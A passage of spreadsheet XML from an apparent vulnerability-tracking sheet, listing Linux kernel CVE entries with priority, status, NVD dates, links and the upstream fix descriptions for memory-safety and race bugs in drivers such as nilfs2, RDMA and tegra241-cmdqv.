Size the buffer for the widest unsigned decimal, format with "%u" to match
the u32, and use scnprintf() so the length passed to
simple_read_from_buffer() reflects the bytes actually stored.</t>
        </is>
      </c>
      <c r="T784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90416</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90417</t>
        </is>
      </c>
      <c r="D785" s="5" t="inlineStr"/>
      <c r="E785" s="5" t="inlineStr"/>
      <c r="F785" s="5" t="inlineStr"/>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="inlineStr"/>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr"/>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q785" s="5" t="inlineStr"/>
      <c r="R785" s="5" t="inlineStr"/>
      <c r="S785" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: Fix dereg_skb leak and double free in write_tpt_entry()
When the device is in the fatal error state, write_tpt_entry() returns -EIO
before handing the caller's preallocated skb to the transmit path; its
allocation-failure returns do the same. c4iw_dereg_mr() ignores the error
and frees mhp, leaking mhp-&gt;dereg_skb. c4iw_get_dma_mr() instead frees the
skb a second time after dereg_mem() already consumed it, a double free.
Make write_tpt_entry() the sole owner of a non-NULL skb, freeing it on
every return preceding handoff to c4iw_ofld_send(): fatal error, tpt and
stag allocation failure. c4iw_ofld_send() consumes the skb on success and
error alike, so drop the redundant kfree_skb() in c4iw_get_dma_mr() after
dereg_mem().</t>
        </is>
      </c>
      <c r="T785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90417</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90418</t>
        </is>
      </c>
      <c r="D786" s="5" t="inlineStr"/>
      <c r="E786" s="5" t="inlineStr"/>
      <c r="F786" s="5" t="inlineStr"/>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="inlineStr"/>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr"/>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q786" s="5" t="inlineStr"/>
      <c r="R786" s="5" t="inlineStr"/>
      <c r="S786" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix BUG in nilfs_copy_dirty_pages() on dirty state mismatch
Syzbot reported a kernel BUG triggered within nilfs_copy_dirty_pages(),
which copies dirty DAT file folios/pages to its shadow page cache.  The
BUG occurs when a retrieved dirty folio/page unexpectedly loses its
'dirty' status.
This issue arises because, since the commit referenced below, the 'dirty'
flag of a folio/page can be cleared asynchronously after the filesystem
detects metadata corruption and transitions to read-only mode.
Resolve the issue by returning an -EROFS error if the filesystem has
transitioned to read-only mode.  Also change the behavior to issue a
kernel warning only once instead of triggering a kernel BUG when this
unexpected 'dirty' state is detected while the filesystem is not in
read-only mode.</t>
        </is>
      </c>
      <c r="T786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90418</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90419</t>
        </is>
      </c>
      <c r="D787" s="5" t="inlineStr"/>
      <c r="E787" s="5" t="inlineStr"/>
      <c r="F787" s="5" t="inlineStr"/>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="inlineStr"/>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr"/>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q787" s="5" t="inlineStr"/>
      <c r="R787" s="5" t="inlineStr"/>
      <c r="S787" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: prevent out-of-bounds read in super root block parsing
super-root inode metadata size is trusted before nilfs_read_inode_common().
Reject super-root inode sizes whose computed on-disk footprint exceeds the
filesystem block size. This prevents malformed filesystem images from
making nilfs_read_inode_common() read past the end of the super-root block.
[ryusuke: clarify the commit title]</t>
        </is>
      </c>
      <c r="T787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90419</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90420</t>
        </is>
      </c>
      <c r="D788" s="5" t="inlineStr"/>
      <c r="E788" s="5" t="inlineStr"/>
      <c r="F788" s="5" t="inlineStr"/>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="inlineStr"/>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr"/>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q788" s="5" t="inlineStr"/>
      <c r="R788" s="5" t="inlineStr"/>
      <c r="S788" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix infinite loop in nilfs_clean_segments()
syzbot reported a hung task in nilfs_transaction_begin(). This occurs
because the cleaner ioctl falls into an infinite loop if
nilfs_segctor_construct() repeatedly returns -EROFS (e.g. the device
is remounted as read-only after an I/O error).
Currently in nilfs_clean_segments(), if err is non-zero, it logs the
error and sleeps but doesn't abort when it encounters a terminal error
like -EROFS. This causes the thread to loop forever.
Fix this by breaking out of the loop if nilfs_segctor_construct()
returns -EROFS. This matches the behaviour in
nilfs_segctor_write_out(), which also handles -EROFS.</t>
        </is>
      </c>
      <c r="T788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90420</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90421</t>
        </is>
      </c>
      <c r="D789" s="5" t="inlineStr"/>
      <c r="E789" s="5" t="inlineStr"/>
      <c r="F789" s="5" t="inlineStr"/>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="inlineStr"/>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr"/>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q789" s="5" t="inlineStr"/>
      <c r="R789" s="5" t="inlineStr"/>
      <c r="S789" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: Fix UAF when probe runs concurrent to dyn ID removal
Dynamic IDs are only guaranteed to be valid when dynids.lock is held,
as remove_id_store() can free the node. Thus, make a copy in
pci_match_device(). Also, clarify that the id parameter is only valid
during probe.</t>
        </is>
      </c>
      <c r="T789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90421</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90422</t>
        </is>
      </c>
      <c r="D790" s="5" t="inlineStr"/>
      <c r="E790" s="5" t="inlineStr"/>
      <c r="F790" s="5" t="inlineStr"/>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="inlineStr"/>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr"/>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q790" s="5" t="inlineStr"/>
      <c r="R790" s="5" t="inlineStr"/>
      <c r="S790" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: mediatek: pllfh: Fix IO remapping leak in register_pllfhs error path
When mtk_clk_register_pllfhs function fails to register a PLL, it
unregisters all PLLs and cleans up itself in its error path before
returning, so the function callers don't need to do it.
But contrary to mtk_clk_unregister_pllfhs function, that does almost
the same sequence, it does not free the IO memory mapped on fhctl node,
leading to a leak.
Fix this leak by factorizing the cleanup sequence in a new private
function and use it both mtk_clk_register_pllfhs and
mtk_clk_unregister_pllfhs functions.
Also, change the loop index start value to avoid the -1 operation on
index at each loop.</t>
        </is>
      </c>
      <c r="T790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90422</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90423</t>
        </is>
      </c>
      <c r="D791" s="5" t="inlineStr"/>
      <c r="E791" s="5" t="inlineStr"/>
      <c r="F791" s="5" t="inlineStr"/>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="inlineStr"/>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q791" s="5" t="inlineStr"/>
      <c r="R791" s="5" t="inlineStr"/>
      <c r="S791" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rxe: Fix UAF in ODP init error-handling path
rxe_odp_mr_init_user() stores &amp;umem_odp-&gt;umem in mr-&gt;umem before
calling rxe_odp_init_pages(). If rxe_odp_init_pages() fails,
rxe_odp_mr_init_user() releases umem_odp and returns an error.
rxe_reg_user_mr() then unwinds the error through rxe_cleanup(),
rxe_mr_cleanup(), ib_umem_release(mr-&gt;umem). There is an
IS_ERR_OR_NULL(umem) check at the start of ib_umem_release().
But since mr-&gt;umem is NOT reset to NULL in the error handling
path of rxe_odp_mr_init_user(), the check passes and it reads
already-freed fields like umem-&gt;is_dmabuf, causing UAF.
Fix the UAF by clearing mr-&gt;umem after releasing the failed
ODP umem so the MR cleanup path does not release it again.</t>
        </is>
      </c>
      <c r="T791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90423</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90424</t>
        </is>
      </c>
      <c r="D792" s="5" t="inlineStr"/>
      <c r="E792" s="5" t="inlineStr"/>
      <c r="F792" s="5" t="inlineStr"/>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="inlineStr"/>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q792" s="5" t="inlineStr"/>
      <c r="R792" s="5" t="inlineStr"/>
      <c r="S792" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Fix VINTF0 leak on the init-failure path
tegra241_cmdqv_init_structures() allocates VINTF0 with kzalloc_obj(), inits
it, and preallocates its logical VCMDQs. Two of its error paths leak.
When tegra241_cmdqv_init_vintf() fails it returns before VINTF0 reaches the
cmdqv-&gt;vintfs[] array, so the devres unwind on probe failure cannot reach
it; free it directly there.
A later VCMDQ preallocation failure instead leaves VINTF0 published, and so
this time the unwind does reach tegra241_cmdqv_remove_vintf(), which then
frees it from vintf-&gt;hyp_own. But tegra241_vintf_hw_init() sets that flag
only afterward, from a HW read-back, so the still-uninited VINTF0 reads as
guest-owned and leaks, with mutex_destroy() and ida_destroy() run on fields
it never set up.
Decide ownership from vintf-&gt;idx instead, the index assigned when its id is
allocated: idx 0 is the kernel-owned VINTF0, while idx &gt;= 1 marks a guest
VINTF. So the in-kernel free decision in tegra241_cmdqv_remove_vintf() and
tegra241_vintf_free_lvcmdq() now keys on idx too, and hyp_own stays a pure
HW-readback state.</t>
        </is>
      </c>
      <c r="T792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90424</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90425</t>
        </is>
      </c>
      <c r="D793" s="5" t="inlineStr"/>
      <c r="E793" s="5" t="inlineStr"/>
      <c r="F793" s="5" t="inlineStr"/>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="inlineStr"/>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr"/>
      <c r="L793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q793" s="5" t="inlineStr"/>
      <c r="R793" s="5" t="inlineStr"/>
      <c r="S793" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Require exactly one Stream ID for a vSID
tegra241_vintf_init_vsid() maps a guest vSID to a single physical Stream ID
taken from master-&gt;streams[0], and only warns when the device does not have
exactly one stream. A device with several streams gets only its first one
mapped, so a guest vSID invalidation cannot reach the others' ATC and IOTLB
entries; a device with none makes master-&gt;streams a ZERO_SIZE_PTR, read out
of bounds.
Reject the mapping with -EOPNOTSUPP if master-&gt;num_streams is not one.</t>
        </is>
      </c>
      <c r="T793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90425</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90426</t>
        </is>
      </c>
      <c r="D794" s="5" t="inlineStr"/>
      <c r="E794" s="5" t="inlineStr"/>
      <c r="F794" s="5" t="inlineStr"/>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="inlineStr"/>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr"/>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q794" s="5" t="inlineStr"/>
      <c r="R794" s="5" t="inlineStr"/>
      <c r="S794" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Free the error IRQ before tearing down VINTFs
tegra241_cmdqv_remove() tears each VINTF down first, then calls free_irq().
Tearing a VINTF down frees vintf0 and clears cmdqv-&gt;vintfs[0]. An error in
that window makes tegra241_cmdqv_isr() read the stale slot and hand it to
tegra241_vintf0_handle_error(), which dereferences a NULL or freed pointer.
Free the IRQ before tearing the VINTFs down. free_irq() waits for in-flight
handlers to finish and blocks new ones, so no ISR can observe a VINTF as it
is torn down.
Note: a user-owned VINTF (viommu) could outlive this teardown, which unmaps
cmdqv-&gt;base and frees cmdqv-&gt;vintfs, so a later viommu close then touches
freed memory. This is neither introduced nor fixed here: a physical IOMMU
is not a pluggable device, so iommufd by design holds no reference on the
one behind a viommu, and this teardown is not expected while that viommu is
still alive.</t>
        </is>
      </c>
      <c r="T794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90426</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90427</t>
        </is>
      </c>
      <c r="D795" s="5" t="inlineStr"/>
      <c r="E795" s="5" t="inlineStr"/>
      <c r="F795" s="5" t="inlineStr"/>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="inlineStr"/>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr"/>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q795" s="5" t="inlineStr"/>
      <c r="R795" s="5" t="inlineStr"/>
      <c r="S795" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Don't fall back to a freed smmu after devm_krealloc()
__tegra241_cmdqv_probe() uses devm_krealloc() to grow @smmu into the larger
tegra241_cmdqv, which frees the original @smmu once it relocates. A failure
after that returned NULL, and the caller then dereferenced the freed @smmu
on its fallback path.
Return an int and take @smmu by reference instead, then update *smmu to the
reallocated pointer after devm_krealloc() succeeds, so the caller and its
fallback path both use the live @smmu rather than the freed original.</t>
        </is>
      </c>
      <c r="T795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90427</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90428</t>
        </is>
      </c>
      <c r="D796" s="5" t="inlineStr"/>
      <c r="E796" s="5" t="inlineStr"/>
      <c r="F796" s="5" t="inlineStr"/>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="inlineStr"/>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr"/>
      <c r="L796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q796" s="5" t="inlineStr"/>
      <c r="R796" s="5" t="inlineStr"/>
      <c r="S796" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Don't run the error ISR before probe sets up vintfs
__tegra241_cmdqv_probe() requests the error IRQ before it has allocated the
cmdqv-&gt;vintfs array and set cmdqv-&gt;num_vintfs. A CMDQV left enabled with a
latched error across a kexec fires the IRQ as soon as it is requested, and
tegra241_cmdqv_isr() then walks the uninitialized cmdqv-&gt;vintfs array.
Request the IRQ only after cmdqv-&gt;vintfs is allocated and zeroed, so that
a latched interrupt firing early runs the ISR against a valid array of NULL
slots that it safely skips.</t>
        </is>
      </c>
      <c r="T796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90428</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90429</t>
        </is>
      </c>
      <c r="D797" s="5" t="inlineStr"/>
      <c r="E797" s="5" t="inlineStr"/>
      <c r="F797" s="5" t="inlineStr"/>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="inlineStr"/>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q797" s="5" t="inlineStr"/>
      <c r="R797" s="5" t="inlineStr"/>
      <c r="S797" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Synchronize the error ISR against VINTF (de)init
A user VINTF is torn down by tegra241_cmdqv_deinit_vintf(), which runs from
the destroy callback and from the init-failure unwind in the alloc handler.
It clears the cmdqv-&gt;vintfs[] slot and lets the iommufd core free it, but
nothing serializes that against the error interrupt: tegra241_cmdqv_isr()
reads cmdqv-&gt;vintfs[idx] and dereferences the vintf. A concurrent error can
make the ISR read a slot mid-clear (a NULL deref) or use a vintf which is
about to be freed (a use-after-free).
deinit_vintf() also returns idx to the IDA before clearing the slot, so a
concurrent create that reuses idx can publish its new vintf into the slot,
only for this teardown to erase it again with the stale NULL store.
On the other end, tegra241_cmdqv_init_vintf() publishes a new vintf with a
plain store to the cmdqv-&gt;vintfs[] slot, and the ISR dereferences fields of
a published vintf such as vintf-&gt;base. A plain store gives no ordering on a
weakly-ordered CPU, and a stale VINTF_ERR_MAP bit on a reused idx can make
the ISR pick a vintf the moment it is published, before its fields are set
or tegra241_vintf_hw_init() runs.
The cmdqv-&gt;vintfs[0] slot stays NULL until tegra241_cmdqv_init_structures()
first creates VINTF0, so the slot 0 read needs the same NULL check.
Publish every slot with an smp_store_release(), and read each slot in the
ISR with an smp_load_acquire() under a NULL check, so the ISR always sees
a fully built vintf or NULL. Also make deinit_vintf() clear the slot, and
synchronize_irq() prior to returning idx to the IDA, so no vintf is freed
under a running handler and no reused idx is clobbered.</t>
        </is>
      </c>
      <c r="T797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90429</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90430</t>
        </is>
      </c>
      <c r="D798" s="5" t="inlineStr"/>
      <c r="E798" s="5" t="inlineStr"/>
      <c r="F798" s="5" t="inlineStr"/>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="inlineStr"/>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr"/>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q798" s="5" t="inlineStr"/>
      <c r="R798" s="5" t="inlineStr"/>
      <c r="S798" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Publish an LVCMDQ only after it is fully initialized
tegra241_vintf_init_lvcmdq() stores the freshly allocated vcmdq pointer to
the vintf-&gt;lvcmdqs[] array, before tegra241_vcmdq_alloc_smmu_cmdq() builds
the vcmdq-&gt;cmdq. The error ISR dereferences that cmdq, so a latched LVCMDQ
error (e.g. one inherited across a kexec) firing in this window would make
tegra241_vintf0_handle_error() pass the still-zeroed arm_smmu_cmdq down to
__arm_smmu_cmdq_skip_err(), dereferencing NULL queue register pointers.
Drop the store from tegra241_vintf_init_lvcmdq() and publish the vcmdq at
the end of the allocation instead, with an smp_store_release() that pairs
with an smp_load_acquire() in the ISR, which can see a fully built LVCMDQ
or NULL.
The user-owned LVCMDQ allocation moves accordingly, publishing the vcmdq
once tegra241_vcmdq_hw_init_user() succeeds, using a plain store since a
user VINTF's lvcmdqs[] has no lockless reader -- the error ISR only walks
the VINTF0 array.</t>
        </is>
      </c>
      <c r="T798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90430</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
